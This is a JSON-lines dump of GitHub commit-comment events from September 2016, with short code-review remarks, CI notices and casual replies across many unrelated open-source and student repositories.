{"id":"4624891613","type":"CommitCommentEvent","actor":{"login":"tonytlwu"},"repo":{"name":"Fliplet/fliplet-cli"},"payload":{"comment":{"id":19192391,"position":null,"line":null,"path":null,"commit_id":"f4e99ce3565a20079c40a45eb972789ca57885bf","created_at":"2016-09-27T15:16:05Z","updated_at":"2016-09-27T15:16:05Z","body":"👍 "}},"created_at":"2016-09-27T15:16:05Z"}
{"id":"4624892996","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192396,"position":117,"line":474,"path":"plugins/system_upgrade.py","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:16:16Z","updated_at":"2016-09-27T15:16:16Z","body":"distro-sync is not supported?"}},"created_at":"2016-09-27T15:16:16Z"}
{"id":"4624893874","type":"CommitCommentEvent","actor":{"login":"themiurgo"},"repo":{"name":"DenisCarriere/geocoder"},"payload":{"comment":{"id":19192397,"position":null,"line":null,"path":null,"commit_id":"4c965abc38f3b8686ae98b53bf49028275605b20","created_at":"2016-09-27T15:16:24Z","updated_at":"2016-09-27T15:16:24Z","body":"I see. Would a \"GoogleFW\" provider with different rate limits work? It would simply be a copy of the google.py file with only the rate limits changed."}},"created_at":"2016-09-27T15:16:24Z"}
{"id":"4624894082","type":"CommitCommentEvent","actor":{"login":"squallstar"},"repo":{"name":"Fliplet/fliplet-cli"},"payload":{"comment":{"id":19192398,"position":null,"line":null,"path":null,"commit_id":"f4e99ce3565a20079c40a45eb972789ca57885bf","created_at":"2016-09-27T15:16:26Z","updated_at":"2016-09-27T15:16:26Z","body":"as per docs here https://github.com/request/request"}},"created_at":"2016-09-27T15:16:26Z"}
{"id":"4624894236","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192400,"position":17,"line":15,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:16:27Z","updated_at":"2016-09-27T15:16:27Z","body":"По конвенции для [именованных аргументов](http://www.diveintopython.net/power_of_introspection/optional_arguments.html) пробелы вокруг = писать не надо"}},"created_at":"2016-09-27T15:16:27Z"}
{"id":"4624894355","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19192401,"position":33,"line":33,"path":"src/ru/sberbank/school/homework5/TerminalImpl.java","commit_id":"4618a7cc49b48ebfb3c30af9b4f21003d6c7c4dd","created_at":"2016-09-27T15:16:28Z","updated_at":"2016-09-27T15:16:28Z","body":"Здесь нужно все исключения отделить друг от друга, так как им нужны разные обработчики: неверный пин - окно с предупреждением, аккаунт заблокирован - другое окно с информацией о разблокировке."}},"created_at":"2016-09-27T15:16:28Z"}
{"id":"4624901523","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19192421,"position":null,"line":null,"path":null,"commit_id":"943dccb9a3766703020db0fc55ff2a730296f916","created_at":"2016-09-27T15:17:34Z","updated_at":"2016-09-27T15:17:34Z","body":"@JoinRajuncraftNow \r\n`deeted it`?\r\nLOL"}},"created_at":"2016-09-27T15:17:34Z"}
{"id":"4624901886","type":"CommitCommentEvent","actor":{"login":"Burning-Chai"},"repo":{"name":"toyosge/mMoney"},"payload":{"comment":{"id":19192423,"position":10,"line":46,"path":"app/repository/daily-money-report.js","commit_id":"73fba54f935ac49bdb9d8fc2ba490dba8660374a","created_at":"2016-09-27T15:17:36Z","updated_at":"2016-09-27T15:17:36Z","body":"please remove console.log"}},"created_at":"2016-09-27T15:17:36Z"}
{"id":"4624902249","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192426,"position":19,"line":17,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:17:39Z","updated_at":"2016-09-27T15:17:39Z","body":"Ну, и раз ```if (request.method == \"POST\"):``` не нужен, этот `else` тоже не нужен."}},"created_at":"2016-09-27T15:17:39Z"}
{"id":"4624902566","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192427,"position":9,"line":9,"path":"src/ru/sberbank/school/task5/PinValidator.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:17:42Z","updated_at":"2016-09-27T15:17:42Z","body":"На занятии расскажу, почему нельзя пароли хранить в виде строк."}},"created_at":"2016-09-27T15:17:42Z"}
{"id":"4624902616","type":"CommitCommentEvent","actor":{"login":"gopher2"},"repo":{"name":"gopher2/glinetpineapple"},"payload":{"comment":{"id":19192428,"position":null,"line":null,"path":null,"commit_id":"a0b89de9d5fe3ba5d61d4f4f091827380b458b53","created_at":"2016-09-27T15:17:42Z","updated_at":"2016-09-27T15:17:42Z","body":"no sure about those, not familiar with those modules\n\nOn Tue, Sep 27, 2016 at 1:47 AM, wesselah <notifications@github.com> wrote:\n\n> I do not mean the modules for the wireless adapters but the additional\n> modules like sslstrip . Do i need to compile those ?\n> The first modules can be updated but then the ar150 freezes\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gopher2/glinetpineapple/commit/a0b89de9d5fe3ba5d61d4f4f091827380b458b53#commitcomment-19185392>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAPac0Dz4D7RVt9_RKiQXsiHqUKe4QOkks5quK4PgaJpZM4KF1yH>\n> .\n>\n"}},"created_at":"2016-09-27T15:17:42Z"}
{"id":"4624907484","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192449,"position":89,"line":65,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:18:26Z","updated_at":"2016-09-27T15:18:26Z","body":"Лишняя пустая строка."}},"created_at":"2016-09-27T15:18:26Z"}
{"id":"4624910658","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192458,"position":95,"line":71,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:18:55Z","updated_at":"2016-09-27T15:18:55Z","body":"Мусор надо сразу удалять."}},"created_at":"2016-09-27T15:18:55Z"}
{"id":"4624910691","type":"CommitCommentEvent","actor":{"login":"themiurgo"},"repo":{"name":"DenisCarriere/geocoder"},"payload":{"comment":{"id":19192459,"position":null,"line":null,"path":null,"commit_id":"4c965abc38f3b8686ae98b53bf49028275605b20","created_at":"2016-09-27T15:18:56Z","updated_at":"2016-09-27T15:18:56Z","body":"Oh, now I'm reading better: you would like to change the limits dynamically when the user provides the credentials. I think there's a way to achieve this, basically by changing dynamically the ratelimited function. I'll look into that and I might send a PR. 👍 "}},"created_at":"2016-09-27T15:18:56Z"}
{"id":"4624912830","type":"CommitCommentEvent","actor":{"login":"faroit"},"repo":{"name":"stefan-balke/auswertung-heike-balke"},"payload":{"comment":{"id":19192464,"position":3,"line":3,"path":"LICENSE.md","commit_id":"ba9333242d7cca5e603563926ece9c4b130bcb37","created_at":"2016-09-27T15:19:14Z","updated_at":"2016-09-27T15:19:14Z","body":"they will love it ;-)"}},"created_at":"2016-09-27T15:19:14Z"}
{"id":"4624916041","type":"CommitCommentEvent","actor":{"login":"cyankw"},"repo":{"name":"cyankw/keyboard_recorder"},"payload":{"comment":{"id":19192474,"position":null,"line":null,"path":null,"commit_id":"c9fd25f107c0a517ade611a3982e50725dd740cc","created_at":"2016-09-27T15:19:45Z","updated_at":"2016-09-27T15:19:45Z","body":"add in accurate timestamp;\r\nadd in mouse trace part;\r\nadd in windowsName update method."}},"created_at":"2016-09-27T15:19:45Z"}
{"id":"4624917047","type":"CommitCommentEvent","actor":{"login":"toyosge"},"repo":{"name":"toyosge/mMoney"},"payload":{"comment":{"id":19192477,"position":10,"line":46,"path":"app/repository/daily-money-report.js","commit_id":"73fba54f935ac49bdb9d8fc2ba490dba8660374a","created_at":"2016-09-27T15:19:53Z","updated_at":"2016-09-27T15:19:53Z","body":"shut up"}},"created_at":"2016-09-27T15:19:53Z"}
{"id":"4624920157","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192481,"position":15,"line":15,"path":"src/ru/sberbank/school/task5/PinValidator.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:20:21Z","updated_at":"2016-09-27T15:20:21Z","body":"Не совсем понял на счёт Pattern.compile(this.pin).\r\nВообще, идея валидатора пина была несколько другой - реальная проверка его верности.\r\nНо вариант с проверкой на соответствие шаблону тоже хорошая вещь."}},"created_at":"2016-09-27T15:20:21Z"}
{"id":"4624921373","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19192484,"position":null,"line":null,"path":null,"commit_id":"50456e1a7ed90d37545e14162d4a7ce6ab241cb5","created_at":"2016-09-27T15:20:32Z","updated_at":"2016-09-27T15:20:32Z","body":"PS : tested : seems to be apply in lts too."}},"created_at":"2016-09-27T15:20:32Z"}
{"id":"4624926573","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192501,"position":14,"line":14,"path":"src/ru/sberbank/school/task5/PinValidator.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:21:18Z","updated_at":"2016-09-27T15:21:18Z","body":"Обычно в валидаторах такие методы называются validate."}},"created_at":"2016-09-27T15:21:18Z"}
{"id":"4624930724","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192509,"position":97,"line":73,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:21:55Z","updated_at":"2016-09-27T15:21:55Z","body":"Хорошо бы строки 66-73 завернуть в функцию, а её уже звать из [`if __name__ == \"__main__\":`](http://effbot.org/pyfaq/tutor-what-is-if-name-main-for.htm)."}},"created_at":"2016-09-27T15:21:55Z"}
{"id":"4624933647","type":"CommitCommentEvent","actor":{"login":"agilefox"},"repo":{"name":"vimeo/vimeo.py"},"payload":{"comment":{"id":19192515,"position":105,"line":82,"path":"vimeo/exceptions.py","commit_id":"530a792e70c05363ed74910d9bd62eaa2d826cac","created_at":"2016-09-27T15:22:19Z","updated_at":"2016-09-27T15:22:19Z","body":"damn, spelling :("}},"created_at":"2016-09-27T15:22:19Z"}
{"id":"4624935430","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19192517,"position":null,"line":null,"path":null,"commit_id":"6b45d7e328fc1360aa7ce1782cf4be2b5ce81a0c","created_at":"2016-09-27T15:22:34Z","updated_at":"2016-09-27T15:22:34Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create domain model, repository, domain model validator for Activity](https://trello.com/c/LBCSCKtp/9-create-domain-model-repository-domain-model-validator-for-activity)"}},"created_at":"2016-09-27T15:22:34Z"}
{"id":"4624935777","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19192518,"position":19,"line":1523,"path":"app/assets/javascripts/plannings.js","commit_id":"7196df36d36bff568bd29123bb7a4a7c363ca694","created_at":"2016-09-27T15:22:37Z","updated_at":"2016-09-27T15:22:37Z","body":"use $ instead of jQuery"}},"created_at":"2016-09-27T15:22:37Z"}
{"id":"4624936432","type":"CommitCommentEvent","actor":{"login":"pysailor"},"repo":{"name":"plone/plone.patternslib"},"payload":{"comment":{"id":19192519,"position":205,"line":444,"path":"src/plone/patternslib/profiles/default/registry.xml","commit_id":"2a4ce7c02487d3099a6b0d88aaaf5a817af2a118","created_at":"2016-09-27T15:22:43Z","updated_at":"2016-09-27T15:22:43Z","body":"@thet I was just trying to install plone.patternslib from src-checkout and noticed that the \"patterns\" bundle did not get installed. After some bisecting I found this commit, where the bundle registration got removed.\r\nWas this intentional? It does not seem to fit the commit message."}},"created_at":"2016-09-27T15:22:43Z"}
{"id":"4624937737","type":"CommitCommentEvent","actor":{"login":"pjsier"},"repo":{"name":"NORCatUofC/rain"},"payload":{"comment":{"id":19192522,"position":37,"line":41,"path":"nexrad-etl/NEXRAD Download and Process.ipynb","commit_id":"3b7b227547efb8f682c1b6a907eaca5d77743540","created_at":"2016-09-27T15:22:54Z","updated_at":"2016-09-27T15:22:54Z","body":"@chibill So that ID was for a download request I submitted to NOAA through the [Climate Data Online](http://www.ncdc.noaa.gov/cdo-web/) tool, and I'm guessing that the links expire. If you want to give it a try downloading a Level 3 dataset (though we're moving away from those), you can try submitting a request there"}},"created_at":"2016-09-27T15:22:54Z"}
{"id":"4624939771","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"Muqsit/Help"},"payload":{"comment":{"id":19192525,"position":null,"line":null,"path":null,"commit_id":"cb8185e8bf7ac681302f89bc50d78cc885bc6acd","created_at":"2016-09-27T15:23:12Z","updated_at":"2016-09-27T15:23:12Z","body":"What :D"}},"created_at":"2016-09-27T15:23:12Z"}
{"id":"4624940415","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"ubcgif/em_examples"},"payload":{"comment":{"id":19192526,"position":4,"line":6,"path":"requirements.txt","commit_id":"dfb3a0b226f282c0d2a43c001329156f9428e724","created_at":"2016-09-27T15:23:18Z","updated_at":"2016-09-27T15:23:18Z","body":"ah, I see. Fair enough. "}},"created_at":"2016-09-27T15:23:18Z"}
{"id":"4624942084","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19192530,"position":9,"line":195,"path":"test/api/v01/plannings_test.rb","commit_id":"7196df36d36bff568bd29123bb7a4a7c363ca694","created_at":"2016-09-27T15:23:32Z","updated_at":"2016-09-27T15:23:32Z","body":"count nb of returned plannings (done in other tests with JSON.parse response for instance for json ext)"}},"created_at":"2016-09-27T15:23:32Z"}
{"id":"4624943984","type":"CommitCommentEvent","actor":{"login":"ljieyao"},"repo":{"name":"TownLeak/Multi_Level_Marketing_Management"},"payload":{"comment":{"id":19192539,"position":null,"line":null,"path":null,"commit_id":"7bc738763cc52b4b9278dde556686a9ca15544dc","created_at":"2016-09-27T15:23:49Z","updated_at":"2016-09-27T15:23:49Z","body":"can you provide more information on how to setup and deploy?"}},"created_at":"2016-09-27T15:23:49Z"}
{"id":"4624945221","type":"CommitCommentEvent","actor":{"login":"lheagy"},"repo":{"name":"ubcgif/em_examples"},"payload":{"comment":{"id":19192544,"position":4,"line":6,"path":"requirements.txt","commit_id":"dfb3a0b226f282c0d2a43c001329156f9428e724","created_at":"2016-09-27T15:24:00Z","updated_at":"2016-09-27T15:24:00Z","body":"we can probably ad an __init__.py file at the root, but this is fine for now"}},"created_at":"2016-09-27T15:24:00Z"}
{"id":"4624947297","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19192548,"position":5,"line":90,"path":"contrib/windows/msys_build.sh","commit_id":"c8e090ca778f5f99d7b1dba56c04c2de56b4782b","created_at":"2016-09-27T15:24:17Z","updated_at":"2016-09-27T15:24:17Z","body":"fine, but you should be using a win native 7zip"}},"created_at":"2016-09-27T15:24:17Z"}
{"id":"4624947998","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuH33/mapotempo-web"},"payload":{"comment":{"id":19192553,"position":16,"line":202,"path":"test/api/v01/plannings_test.rb","commit_id":"7196df36d36bff568bd29123bb7a4a7c363ca694","created_at":"2016-09-27T15:24:24Z","updated_at":"2016-09-27T15:24:24Z","body":"use real planning id and count nb of returned plannings (done in other tests with JSON.parse response for instance for json ext)"}},"created_at":"2016-09-27T15:24:24Z"}
{"id":"4624948589","type":"CommitCommentEvent","actor":{"login":"BennyHill"},"repo":{"name":"milessabin/shapeless"},"payload":{"comment":{"id":19192556,"position":7,"line":25,"path":"build.sbt","commit_id":"1ebf7b7d2d3b2118b32ebbc5be60b198726152e3","created_at":"2016-09-27T15:24:29Z","updated_at":"2016-09-27T15:24:29Z","body":"Should \"2.11.8\" in `crossScalaVersions` also be \"2.11.8-bin-typelevel-update-1\"?"}},"created_at":"2016-09-27T15:24:29Z"}
{"id":"4624950417","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192560,"position":14,"line":14,"path":"src/ru/sberbank/school/task5/TerminalImpl.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:24:45Z","updated_at":"2016-09-27T15:24:45Z","body":"Проверка баланса - скорее выписка по счёту."}},"created_at":"2016-09-27T15:24:45Z"}
{"id":"4624951073","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19192562,"position":null,"line":null,"path":null,"commit_id":"1fbaea0b41eea06ea7e3370278c5064573d2a63f","created_at":"2016-09-27T15:24:52Z","updated_at":"2016-09-27T15:24:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1181](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14403&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T15:24:52Z"}
{"id":"4624957738","type":"CommitCommentEvent","actor":{"login":"fson"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19192578,"position":23,"line":78,"path":"packages/react-scripts/package.json","commit_id":"dc6074abbc7ada0bb19b8828dddadfc25b4bd06b","created_at":"2016-09-27T15:25:50Z","updated_at":"2016-09-27T15:25:50Z","body":"Yeah, that's fine. The most important thing is that this list is updated automatically so we don't miss any packages, and this requirement is satisfied at the moment."}},"created_at":"2016-09-27T15:25:50Z"}
{"id":"4624959023","type":"CommitCommentEvent","actor":{"login":"MOZGIII"},"repo":{"name":"isolo/version-manager"},"payload":{"comment":{"id":19192579,"position":null,"line":null,"path":null,"commit_id":"f4c1591a84a363260700b725f887d48840be29ea","created_at":"2016-09-27T15:26:01Z","updated_at":"2016-09-27T15:26:01Z","body":"This file should reside in `/exe` instead of `/bin`, otherwise it won't be runnable upon installation.\r\n\r\nAlso use relative path for `require`:\r\n\r\n```ruby\r\nrequire 'version_manager'\r\n```\r\n\r\nThen, to test your executable use `ruby -Ilib exe/manver` command"}},"created_at":"2016-09-27T15:26:01Z"}
{"id":"4624960895","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192582,"position":9,"line":9,"path":"src/ru/sberbank/school/task5/TerminalImpl.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:26:18Z","updated_at":"2016-09-27T15:26:18Z","body":"Вообще, по смыслу, клиент не является атрибутом ни терминального сервера, ни валидатора, ни терминала."}},"created_at":"2016-09-27T15:26:18Z"}
{"id":"4624964464","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192592,"position":8,"line":8,"path":"scripts/collection.js","commit_id":"36e35fd1b052cf4868e6c44c1387f5ada2ab5258","created_at":"2016-09-27T15:26:50Z","updated_at":"2016-09-27T15:26:50Z","body":"to be able to get to album.html, we must leave the scripts folder\r\nRight now it's searching inside the same folder collection.js is in, to get out of it, we'll need to use a .. I don't know what your file system looks like, but I am happy to help :)"}},"created_at":"2016-09-27T15:26:50Z"}
{"id":"4624966348","type":"CommitCommentEvent","actor":{"login":"yma88"},"repo":{"name":"yma88/galley"},"payload":{"comment":{"id":19192596,"position":6,"line":1051,"path":"maven/src/main/java/org/commonjava/maven/galley/maven/model/view/MavenPomView.java","commit_id":"976ec8207c15380e2d2b32b3ba4e4f4e23455c0b","created_at":"2016-09-27T15:27:07Z","updated_at":"2016-09-27T15:27:07Z","body":"@jdcasey\r\nAfter kinds of tests and careful research, I found the reason for expression couldn't be resovled in profile should be at here， no any other valueSource will be added if ssi is not null after the first instance new, so no activeProfileIds could be traced. So I change the addValueSource outside the ssi==null judgement.\r\nI've done a cascade test both on galley and indy, they'are all passed."}},"created_at":"2016-09-27T15:27:07Z"}
{"id":"4624972854","type":"CommitCommentEvent","actor":{"login":"Nianic"},"repo":{"name":"Nianic/Nicart_IT2103"},"payload":{"comment":{"id":19192606,"position":null,"line":null,"path":null,"commit_id":"93aa7490107286daf403c787a9531b3412c24c62","created_at":"2016-09-27T15:28:03Z","updated_at":"2016-09-27T15:28:03Z","body":"edi wow hahaha\r\n"}},"created_at":"2016-09-27T15:28:03Z"}
{"id":"4624973159","type":"CommitCommentEvent","actor":{"login":"docdawning"},"repo":{"name":"Smoothieware/Smoothieware"},"payload":{"comment":{"id":19192610,"position":null,"line":null,"path":null,"commit_id":"f43c04b47547217359a1494289da7949e8938040","created_at":"2016-09-27T15:28:06Z","updated_at":"2016-09-27T15:28:06Z","body":"What revisions of the code base apply to this build versus the previous one?"}},"created_at":"2016-09-27T15:28:06Z"}
{"id":"4624982714","type":"CommitCommentEvent","actor":{"login":"kortenkamp"},"repo":{"name":"CindyJS/CindyJS"},"payload":{"comment":{"id":19192633,"position":26,"line":65,"path":"src/js/Events.js","commit_id":"1de6e451439733149fdf91048a07061d2b5f0579","created_at":"2016-09-27T15:29:31Z","updated_at":"2016-09-27T15:29:31Z","body":"here the `Math.sqrt` command could be postponed after the `if (dist>20)` check, by using `if (dist>400)`, which should be faster in case many texts are around."}},"created_at":"2016-09-27T15:29:31Z"}
{"id":"4624983734","type":"CommitCommentEvent","actor":{"login":"Frairiti"},"repo":{"name":"Frairiti/my-first-blog"},"payload":{"comment":{"id":19192634,"position":102,"line":102,"path":"mysite/settings.py","commit_id":"b0b0a7cf1259c2a0ae29ce63051d9e2290464fd9","created_at":"2016-09-27T15:29:40Z","updated_at":"2016-09-27T15:29:40Z","body":"STATIC_ROOT = \"app-root/repo/wsgi/static\"\r\n"}},"created_at":"2016-09-27T15:29:40Z"}
{"id":"4624993895","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19192648,"position":null,"line":null,"path":null,"commit_id":"27e99078d337cdc77a5a7228998d3b2fe722e7cb","created_at":"2016-09-27T15:31:07Z","updated_at":"2016-09-27T15:31:07Z","body":"Could you provide example URL?"}},"created_at":"2016-09-27T15:31:07Z"}
{"id":"4624994670","type":"CommitCommentEvent","actor":{"login":"Xyverz"},"repo":{"name":"Xyverz/qmk_firmware"},"payload":{"comment":{"id":19192653,"position":null,"line":null,"path":null,"commit_id":"479e81327a6603ed9439cb053a1d6baa8800e898","created_at":"2016-09-27T15:31:13Z","updated_at":"2016-09-27T15:31:13Z","body":"that was supposed to read, \"something more planck-like,\" but I forgot that I'd put the enter key where the minus key is normally on my other boards."}},"created_at":"2016-09-27T15:31:13Z"}
{"id":"4624996595","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19192659,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T15:31:29Z","updated_at":"2016-09-27T15:31:29Z","body":"@terrillmoore I isolated this change and submitted a PR to Matthijs. I won't be surprised if he rejects it based on the possibly never-ending do-while loop (taking repeated random guesses until hitting an enabled channel). Statistically it could go on for a long time if the guesses keep falling poorly. Also if only a single channel is enabled, or worse yet, none.\r\n\r\nStill, I prefer your solution to the one a few lines above (in ```_nextTx()```) which does a \"next random channel\" search but statistically favors the first channel of a sub-band 8 to 1 (with one active sub-band). I'll ponder how to make an even-handed yet finite duration algorithm."}},"created_at":"2016-09-27T15:31:29Z"}
{"id":"4624997338","type":"CommitCommentEvent","actor":{"login":"WendyMak"},"repo":{"name":"WendyMak/BattleShip"},"payload":{"comment":{"id":19192660,"position":null,"line":null,"path":null,"commit_id":"f7e0776afde48f0f56ef4274c807bd50204b7ae5","created_at":"2016-09-27T15:31:35Z","updated_at":"2016-09-27T15:31:35Z","body":"Error, please ignore this."}},"created_at":"2016-09-27T15:31:35Z"}
{"id":"4624997473","type":"CommitCommentEvent","actor":{"login":"dmitrymex"},"repo":{"name":"binarin/rabbitmq-server-release"},"payload":{"comment":{"id":19192661,"position":65,"line":1641,"path":"scripts/rabbitmq-server-ha.ocf","commit_id":"d23de344a4a55c243bc3bf19317267bf8ecfb659","created_at":"2016-09-27T15:31:36Z","updated_at":"2016-09-27T15:31:36Z","body":"partitoned -> partitioned"}},"created_at":"2016-09-27T15:31:36Z"}
{"id":"4624997630","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19192662,"position":5,"line":90,"path":"contrib/windows/msys_build.sh","commit_id":"c8e090ca778f5f99d7b1dba56c04c2de56b4782b","created_at":"2016-09-27T15:31:37Z","updated_at":"2016-09-27T15:31:37Z","body":"So the probably stupid question is where can I get one and do I need to do anything with the PATH after installing it for the build script to find it?"}},"created_at":"2016-09-27T15:31:37Z"}
{"id":"4624998853","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19192668,"position":null,"line":null,"path":null,"commit_id":"76e722c06e47df2185abdba75f3cd53297a90b7e","created_at":"2016-09-27T15:31:47Z","updated_at":"2016-09-27T15:31:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1182](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14408&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T15:31:47Z"}
{"id":"4625002359","type":"CommitCommentEvent","actor":{"login":"bloodbare"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19192680,"position":null,"line":null,"path":null,"commit_id":"2b0a7f82eaf7680357ca61bb27f6ae26451dffa9","created_at":"2016-09-27T15:32:18Z","updated_at":"2016-09-27T15:32:18Z","body":"@gforcada mmmm fins ara no m'havia sortit mai això"}},"created_at":"2016-09-27T15:32:18Z"}
{"id":"4625008391","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192691,"position":35,"line":35,"path":"src/ru/sberbank/school/task5/TerminalServer.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:33:01Z","updated_at":"2016-09-27T15:33:01Z","body":"Можно же просто написать balance < sum"}},"created_at":"2016-09-27T15:33:01Z"}
{"id":"4625011620","type":"CommitCommentEvent","actor":{"login":"dmitrymex"},"repo":{"name":"binarin/rabbitmq-server-release"},"payload":{"comment":{"id":19192695,"position":65,"line":1641,"path":"scripts/rabbitmq-server-ha.ocf","commit_id":"d23de344a4a55c243bc3bf19317267bf8ecfb659","created_at":"2016-09-27T15:33:26Z","updated_at":"2016-09-27T15:33:26Z","body":"Also, not 'this node thinks', but rather '$node thinks' :-)"}},"created_at":"2016-09-27T15:33:26Z"}
{"id":"4625013058","type":"CommitCommentEvent","actor":{"login":"MikeCroall"},"repo":{"name":"OhmGeek/ThanCue"},"payload":{"comment":{"id":19192697,"position":null,"line":null,"path":null,"commit_id":"a612f8cc03ea73127e18a7bf47e8e542e1671733","created_at":"2016-09-27T15:33:37Z","updated_at":"2016-09-27T15:33:37Z","body":"HOLY BLANKSPACE RY-MAN"}},"created_at":"2016-09-27T15:33:37Z"}
{"id":"4625018110","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192708,"position":48,"line":48,"path":"src/ru/sberbank/school/task5/TerminalServer.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:34:07Z","updated_at":"2016-09-27T15:34:07Z","body":"Правильнее было бы каждое исключение вынести в отдельный файл. Это бы не засоряло этот."}},"created_at":"2016-09-27T15:34:07Z"}
{"id":"4625020561","type":"CommitCommentEvent","actor":{"login":"maneswork"},"repo":{"name":"maneswork/Authority-Solutions-Library"},"payload":{"comment":{"id":19192712,"position":null,"line":null,"path":null,"commit_id":"060caddb0d4f710a02b52b9a441d13d03e7c7fa0","created_at":"2016-09-27T15:34:19Z","updated_at":"2016-09-27T15:34:19Z","body":"Basically this will make a section or a block of text be clickable with link"}},"created_at":"2016-09-27T15:34:19Z"}
